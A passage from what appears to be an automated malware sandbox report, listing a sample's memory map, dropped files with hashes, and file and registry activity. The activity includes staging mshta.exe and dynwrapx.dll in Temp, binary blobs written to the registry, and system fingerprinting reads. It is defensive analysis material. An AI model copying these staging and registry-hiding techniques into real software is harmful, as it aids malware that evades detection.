|
|
|
- |
| comctl32.dll | 0x6f830000 | 0x6fa3efff | Memory Mapped File | rwx |
|
|
|
- |
| mpr.dll | 0x6fa40000 | 0x6fa55fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x6fa60000 | 0x6faf1fff | Memory Mapped File | rwx |
|
|
|
- |
| adsldpc.dll | 0x6fb00000 | 0x6fb37fff | Memory Mapped File | rwx |
|
|
|
- |
| odbc32.dll | 0x6fb40000 | 0x6fbd8fff | Memory Mapped File | rwx |
|
|
|
- |
| dsrole.dll | 0x6fbe0000 | 0x6fbe7fff | Memory Mapped File | rwx |
|
|
|
- |
| dsuiext.dll | 0x6fbf0000 | 0x6fc98fff | Memory Mapped File | rwx |
|
|
|
- |
| activeds.dll | 0x6fca0000 | 0x6fcdafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdsapi.dll | 0x6fce0000 | 0x6fcfbfff | Memory Mapped File | rwx |
|
|
|
- |
| atl.dll | 0x6fd00000 | 0x6fd17fff | Memory Mapped File | rwx |
|
|
|
- |
| odbctrac.dll | 0x6fd20000 | 0x6fd45fff | Memory Mapped File | rwx |
|
|
|
- |
| dsprop.dll | 0x6fd50000 | 0x6fd76fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000006fea0000 | 0x6fea0000 | 0x6feaffff | Private Memory | rwx |
|
|
|
- |
| winmmbase.dll | 0x6feb0000 | 0x6fed2fff | Memory Mapped File | rwx |
|
|
|
- |
| winmm.dll | 0x6fee0000 | 0x6ff03fff | Memory Mapped File | rwx |
|
|
|
- |
| browcli.dll | 0x6ff10000 | 0x6ff1efff | Memory Mapped File | rwx |
|
|
|
- |
| samlib.dll | 0x6ff20000 | 0x6ff32fff | Memory Mapped File | rwx |
|
|
|
- |
| srvcli.dll | 0x6ff40000 | 0x6ff5bfff | Memory Mapped File | rwx |
|
|
|
- |
| secur32.dll | 0x6ff60000 | 0x6ff69fff | Memory Mapped File | rwx |
|
|
|
- |
| samcli.dll | 0x6ff70000 | 0x6ff84fff | Memory Mapped File | rwx |
|
|
|
- |
| netutils.dll | 0x6ff90000 | 0x6ff99fff | Memory Mapped File | rwx |
|
|
|
- |
| eappcfg.dll | 0x6ffa0000 | 0x6ffe9fff | Memory Mapped File | rwx |
|
|
|
- |
| winscard.dll | 0x6fff0000 | 0x7001cfff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x70040000 | 0x7006efff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x70070000 | 0x70082fff | Memory Mapped File | rwx |
|
|
|
- |
| dpapi.dll | 0x70090000 | 0x70097fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x701e0000 | 0x701f8fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x70200000 | 0x70207fff | Memory Mapped File | rwx |
|
|
|
- |
| winhttp.dll | 0x70210000 | 0x702aafff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x702b0000 | 0x704bcfff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x704c0000 | 0x7063dfff | Memory Mapped File | rwx |
|
|
|
- |
| ondemandconnroutehelper.dll | 0x70b90000 | 0x70ba1fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x71d30000 | 0x71d5efff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x71d60000 | 0x71de3fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x71ea0000 | 0x71eeefff | Memory Mapped File | rwx |
|
|
|
- |
| logoncli.dll | 0x72190000 | 0x721befff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x721f0000 | 0x724bafff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x72770000 | 0x72791fff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x74330000 | 0x7434afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74680000 | 0x74689fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74690000 | 0x746adfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x746c0000 | 0x7471efff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x74720000 | 0x74763fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x74770000 | 0x747b3fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x747c0000 | 0x7487dfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74880000 | 0x74a3cfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74aa0000 | 0x74b1afff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74b20000 | 0x74b64fff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x74b70000 | 0x75068fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x75070000 | 0x7511cfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75120000 | 0x7651efff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x765a0000 | 0x7667ffff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x76680000 | 0x766d2fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x766e0000 | 0x766eefff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x76b60000 | 0x76bf1fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x76ec0000 | 0x76ef6fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76f00000 | 0x7704efff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x77050000 | 0x771c7fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x771d0000 | 0x772bafff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x772c0000 | 0x772c5fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x772d0000 | 0x772ddfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x772e0000 | 0x7730afff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x773a0000 | 0x773f7fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77400000 | 0x7748cfff | Memory Mapped File | rwx |
|
|
|
- |
| netapi32.dll | 0x77490000 | 0x774a2fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x774b0000 | 0x774b6fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x774c0000 | 0x7763dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77760000 | 0x7776bfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77810000 | 0x77956fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77960000 | 0x77adafff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc1562ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc15630000 | 0x7ffc157f0fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc157f1000 | 0x7ffc157f1000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
|
For performance reasons, the remaining 127 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-2172869166-1497266965-2109836178-1000\578c3c4f2234dc4bd77dc4898cd130e8_94f34c22-5cd3-4d50-aa5e-52adff408a05 | 1.43 KB |
MD5:
6a03a546bfb131724e287f21b81ac413
SHA1: a22a071ae0bfb566db0bdebb864f4f5dc5c22f04 SHA256: bfc99ece8e979c586d21891d6351f6340b16ec3a26a4e4d61c3e312974dadbf5 SSDeep: 24:ktD4sMUxtUIDUv3ryiBerzELKlM7XUutgB4TZRvITfrIbpnd3+su6+h49QwIlZKJ:ktD4sVxtUIY/ryicijUuQOR6TIbpksuS |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-2172869166-1497266965-2109836178-1000\578c3c4f2234dc4bd77dc4898cd130e8_94f34c22-5cd3-4d50-aa5e-52adff408a05 | 0.06 KB |
MD5:
bf50918b43f55702fab547696cc28996
SHA1: 299df4c707fe72602a3fbf06685efc1a2b1e320b SHA256: 047c651ad317f5883686847ce068b0760bc5334f311009d4e153ef14b940c5bf SSDeep: 3:/lTlaX+QRD1:Oft1 |
|
|
Host Behavior
File (15)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | \\?\C:\Users\Nd9E1FYi\AppData\Local\Temp\fatal-log.txt | desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| Create | \\?\C:\Users\Nd9E1FYi\AppData\Local\Temp\uncaught-log.txt | desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| Create | \\?\C:\Users\Nd9E1FYi\AppData\Local\Temp\mshta.exe | desired_access = FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, DELETE, file_attributes = FILE_FLAG_OPEN_REPARSE_POINT, FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| Create | \\?\C:\Users\Nd9E1FYi\AppData\Local\Temp\dynwrapx.dll | desired_access = FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, DELETE, file_attributes = FILE_FLAG_OPEN_REPARSE_POINT, FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| Create | \\?\C:\Users\Nd9E1FYi\AppData\Local\Temp\dynwrapx.sxs.manifest | desired_access = FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, DELETE, file_attributes = FILE_FLAG_OPEN_REPARSE_POINT, FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| Create | \\?\C:\Users\Nd9E1FYi\AppData\Local\Temp\mshta.exe.manifest | desired_access = FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, DELETE, file_attributes = FILE_FLAG_OPEN_REPARSE_POINT, FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| Create | \\?\C:\ProgramData\{d781e3a1-e512-422f-aa6c-27428437cbc4}.lock | desired_access = FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_WRITE_EA, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| Get Info | \\?\C:\ProgramData\{d781e3a1-e512-422f-aa6c-27428437cbc4}.lock | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
2 | |
| Open | STD_ERROR_HANDLE | - |
|
2 |
Registry (214)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\AppDataLow | - |
|
2 | |
| Create Key | HKEY_CURRENT_USER\Software\AppDataLow | - |
|
8 | |
| Create Key | HKEY_CURRENT_USER\Software\AppDataLow | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\AppDataLow | - |
|
9 | |
| Create Key | HKEY_CURRENT_USER\Software\AppDataLow | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\AppDataLow | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\AppDataLow | - |
|
5 | |
| Create Key | HKEY_CURRENT_USER\Software\AppDataLow | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\AppDataLow | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\AppDataLow | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft | - |
|
1 | |
| Create Key | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System | - |
|
1 | |
| Create Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\IDE | - |
|
3 | |
| Create Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\SCSI | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\AppDataLow | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\AppDataLow | - |
|
4 | |
| Create Key | HKEY_CURRENT_USER\Software\AppDataLow | - |
|
2 | |
| Create Key | HKEY_CURRENT_USER\Software\AppDataLow | - |
|
3 | |
| Create Key | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System | - |
|
1 | |
| Create Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\SCSI | - |
|
1 | |
| Create Key | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System | - |
|
1 | |
| Create Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\SCSI | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\3 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\IDE | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\SCSI | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\3 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\SCSI | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\SCSI | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion | value_name = DigitalProductId, data = 164 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion | value_name = InstallDate, data = 63 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_0, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_1, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_0, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_1, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_2, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_2, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_3, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_4, type = REG_BINARY |
|
4 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_3, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_5, type = REG_BINARY |
|
4 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_6, type = REG_BINARY |
|
4 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_7, type = REG_BINARY |
|
4 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_8, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_8, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = ProxyEnable |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = ProxyEnable, data = 0 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = ProxyServer |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = ProxyOverride |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = AutoConfigURL |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = AutoDetect |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_0, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_1, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_2, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_3, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_4, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_5, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_6, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_7, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_8, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\SOFTWARE\Microsoft | value_name = {7ade5bfc-66f6-4220-aa24-6032bdb90317}, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\SOFTWARE\Microsoft | value_name = {102f49a9-80c9-42ee-8924-3256738fc621}, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | value_name = ~MHz, data = 172 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | value_name = ProcessorNameString, data = 73 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | value_name = ~MHz, data = 172 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | value_name = ProcessorNameString, data = 73 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2 | value_name = ~MHz, data = 172 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2 | value_name = ProcessorNameString, data = 73 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\3 | value_name = ~MHz, data = 172 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\3 | value_name = ProcessorNameString, data = 73 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System | value_name = SystemBiosVersion, data = 0, type = REG_MULTI_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System | value_name = SystemBiosVersion, data = 39453512, type = REG_MULTI_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = ProxyEnable, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = ProxyServer, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = AutoConfigURL, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\SOFTWARE\Microsoft | value_name = {2dc03b67-bbe0-46f6-a506-c0799ccb1f6b}, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = ProxyEnable |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = ProxyEnable, data = 0 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = ProxyServer |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = ProxyOverride |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = AutoConfigURL |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = AutoDetect |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_0, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_1, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_2, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_3, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_4, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_5, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_6, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_7, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_8, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | value_name = ~MHz, data = 172 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | value_name = ProcessorNameString, data = 73 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | value_name = ~MHz, data = 172 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | value_name = ProcessorNameString, data = 73 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2 | value_name = ~MHz, data = 172 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2 | value_name = ProcessorNameString, data = 73 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\3 | value_name = ~MHz, data = 172 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\3 | value_name = ProcessorNameString, data = 73 |
|
1 | |
| Read Value | HKEY_PERFORMANCE_DATA | value_name = 2, data = 80 |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System | value_name = SystemBiosVersion, data = 0, type = REG_MULTI_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System | value_name = SystemBiosVersion, data = 85780768, type = REG_MULTI_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System | value_name = SystemBiosVersion, data = 0, type = REG_MULTI_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System | value_name = SystemBiosVersion, data = 85781512, type = REG_MULTI_SZ |
|
1 | |
| Write Value | HKEY_CURRENT_USER\SOFTWARE\Microsoft | value_name = {2dc03b67-bbe0-46f6-a506-c0799ccb1f6b}, size = 20, type = REG_BINARY |
|
1 | |
| Write Value | HKEY_CURRENT_USER\SOFTWARE\Microsoft | value_name = {ec58180b-dfce-4a67-b18b-e6d83b3e979b}, size = 0, type = REG_BINARY |
|
1 | |
| Write Value | HKEY_CURRENT_USER\SOFTWARE\Microsoft | value_name = {7ade5bfc-66f6-4220-aa24-6032bdb90317}, size = 4075, type = REG_BINARY |
|
1 | |
| Write Value | HKEY_CURRENT_USER\SOFTWARE\Microsoft | value_name = {102f49a9-80c9-42ee-8924-3256738fc621}, size = 31817, type = REG_BINARY |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\SCSI | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\SCSI | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\SCSI | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\SCSI | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\SCSI | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\SCSI | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\SCSI | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\SCSI | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\SCSI | - |
|
1 | |
